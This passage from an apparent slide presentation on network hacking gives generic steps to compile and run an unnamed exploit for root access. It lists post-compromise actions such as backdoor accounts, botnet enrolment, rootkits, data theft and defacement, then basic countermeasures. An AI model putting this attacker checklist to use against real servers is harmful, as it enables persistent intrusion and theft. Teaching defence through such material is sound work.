    • In the "C:\cygwin" directory run "gcc exploit.c -o exploit"
    • To run the file "exploit.exe", simply type "./exploit"
    • You get root access to the target computer
  • Network Hacking Techniques: Penetrating

    Root access
    Once you get root access, you can:
    • Add yourself as a permanent user for future access
    • Add the server to your botnet collection so it can be used as a weapon against other servers
    • Use it as a proxy to hack other websites
    • Install a rootkit so you can come back and have full control over the server when needed
    • Constantly steal information as it comes
    • Use the system to store illegal data
    • Deface the website; sometimes the hacker will delete everything off of the server
  • Network Hacking Countermeasures: Network Hacking

    Countermeasures
    • Keep all your software up to date
    • There will always be new vulnerabilities coming out, and your responsibility is to patch them immediately after a patch comes out
    • Implement a firewall. This will keep most of the bad data out and good data in
    • Install anti-virus software
    • Scan your system with a vulnerability scanner. This may reveal possible vulnerabilities in your system
  • References

    References
    • http://www.learn-how-to-hack.net
    • http://www.MrCracker.com
    • http://hackthisway.com

    Presentation available at http://akdhamija.webs.com/
    For any clarification, mail me at dhamija.ak@gmail.com